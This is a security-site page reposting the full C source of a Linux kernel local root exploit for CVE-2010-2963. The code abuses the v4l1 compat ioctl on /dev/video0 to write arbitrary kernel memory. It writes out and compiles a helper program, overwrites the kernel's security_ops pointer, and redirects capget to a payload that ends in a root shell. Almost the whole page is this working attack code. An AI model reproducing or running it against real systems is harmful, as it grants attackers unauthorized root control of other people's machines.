首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux kernel arbitrary write memory write via v4l1 compat ioctl exploit
来源:kees[at]ubuntu.com 作者:Kees 发布时间:2010-11-01  
/*
 * CVE-2010-2963
 * Arbitrary write memory write via v4l1 compat ioctl.
 * Kees Cook <kees@ubuntu.com>
 *
 * greets to drosenberg, spender, taviso
 */
 
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include "exp_framework.h"
 
#include <stdint.h>
#include <string.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <linux/videodev.h>
#include <syscall.h>
 
#include <sys/capability.h>
struct cap_header_t {
    uint32_t version;
    int pid;
};
 
#define DEVICE "/dev/video0"
 
struct exploit_state *exp_state;
 
char *desc = "Vyakarana: Linux v4l1 compat ioctl arbitrary memory write";
int requires_null_page = 0;
 
int built = 0;
 
int super_memcpy(unsigned long destination, void *source, int length)
{
    struct video_code vc = { };
    struct video_tuner tuner = { };
    int dev;
    unsigned int code;
    char cmd[80];
 
    if (!built) {
        FILE *source;
        char *sourcecode = "/*\n\
 * CVE-2010-2963: Write kernel memory via v4l compat ioctl.\n\
 * Oct 11, 2010  Kees Cook <kees@ubuntu.com>\n\
 *\n\
 */\n\
#define _GNU_SOURCE\n\
#include <stdio.h>\n\
#include <stdlib.h>\n\
#include <stdint.h>\n\
#include <unistd.h>\n\
#include <sys/types.h>\n\
#include <sys/stat.h>\n\
#include <fcntl.h>\n\
#include <string.h>\n\
#include <sys/ioctl.h>\n\
#include <sys/mman.h>\n\
#include <assert.h>\n\
#include <malloc.h>\n\
#include <sys/types.h>\n\
#include <linux/videodev.h>\n\
#include <syscall.h>\n\
\n\
#define DEVICE \"/dev/video0\"\n\
\n\
struct video_code32 {\n\
        char            loadwhat[16];\n\
        int             datasize;\n\
        int             padding;\n\
        uint64_t        data;\n\
};\n\
\n\
int super_memcpy(uint64_t destination, void *source, int length)\n\
{\n\
    struct video_code32 vc = { };\n\
    struct video_tuner tuner = { };\n\
    int dev;\n\
    unsigned int code;\n\
\n\
    if ( (dev=open(DEVICE, O_RDWR)) < 0) {\n\
        perror(DEVICE);\n\
        return 1;\n\
    }\n\
\n\
    vc.datasize = length;\n\
    vc.data = (uint64_t)(uintptr_t)source;\n\
\n\
    memset(&tuner, 0xBB, sizeof(tuner));\n\
\n\
    // manual union, since a real union won't do ptrs for 64bit\n\
    uint64_t *ptr = (uint64_t*)(&(tuner.name[20]));\n\
    *ptr = destination;\n\
\n\
    // beat memory into the stack...\n\
    code = VIDIOCSTUNER;\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
    syscall(54, dev, code, &tuner);\n\
\n\
    code = 0x4020761b; // VIDIOCSMICROCODE32 (why isn't this VIDIOCSMICROCODE?)\n\
    syscall(54, dev, code, &vc);\n\
\n\
    return 0;\n\
}\n\
\n\
int main(int argc, char *argv[])\n\
{\n\
    uint64_t destination = strtoull(argv[1], NULL, 16);\n\
    uint64_t value = strtoull(argv[2], NULL, 16);\n\
    int length = atoi(argv[3]);\n\
    if (length > sizeof(value))\n\
        length = sizeof(value);\n\
    return super_memcpy(destination, &value, length);\n\
}\n\
";
 
        if (!(source = fopen("vyakarana.c","w"))) {
            fprintf(stderr, "cannot write source\n");
            return 1;
        }
        fwrite(sourcecode, strlen(sourcecode), 1, source);
        fclose(source);
        if (system("gcc -Wall -m32 vyakarana.c -o vyakarana") != 0) {
            fprintf(stderr, "cannot build source\n");
            return 1;
        }
        built = 1;
    }
 
    printf("Writing to %p (len %d): ", (void*)destination, length);
    for (dev=0; dev<length; dev++) {
        printf("0x%02x ", *((unsigned char*)source+dev));
    }
    printf("\n");
 
    sprintf(cmd, "./vyakarana %lx %lx 8", (uint64_t)(uintptr_t)destination, *(uint64_t*)source);
    return system(cmd);
}
 
int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}
 
unsigned long default_sec;
unsigned long target;
unsigned long restore;
 
int prepare(unsigned char *buf)
{
    unsigned long addr;
 
    if (sizeof(long)!=8) {
        printf("Not enough bits\n");
        return 1;
    }
 
    printf("Reticulating splines...\n");
 
    addr = exp_state->get_kernel_sym("security_ops");
    default_sec = exp_state->get_kernel_sym("default_security_ops");
    restore = exp_state->get_kernel_sym("cap_capget");
 
    // reset security_ops
    super_memcpy(addr, &default_sec, sizeof(void*));
 
    // aim capget to enlightenment payload
    target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*));
    super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*));
 
    return 0;
}
 
int trigger(void)
{
    struct cap_header_t hdr;
    uint32_t data[3];
 
    printf("Skipping school...\n");
 
    hdr.version = _LINUX_CAPABILITY_VERSION_1;
    hdr.pid = 1;
    capget((cap_user_header_t)&hdr, (cap_user_data_t)data);
 
    return 1;
}
 
int post(void)
{
    printf("Restoring grammar...\n");
 
    // restore security op pointer
    super_memcpy(target, &restore, sizeof(void*));
 
    return RUN_ROOTSHELL;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Auto CMS <= 1.8 Remote Code Ex
·Buffy v1.3 Remote Directory Tr
·Mongoose Web Server 2.11 Direc
·MetInfo 3.0 PHP Code Injection
·Sybase Advantage Data Architec
·MetInfo 2.0 PHP Code Injection
·Trend Micro Titanium Maximum S
·SmallFTPD v1.0.3 Remote Direct
·Xerox 4595 Denial of Service V
·Home FTP Server v1.11.1.149 RE
·Rising RSNTGDI.sys Local Denia
·yPlay v2.4.5 Denial of Service
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved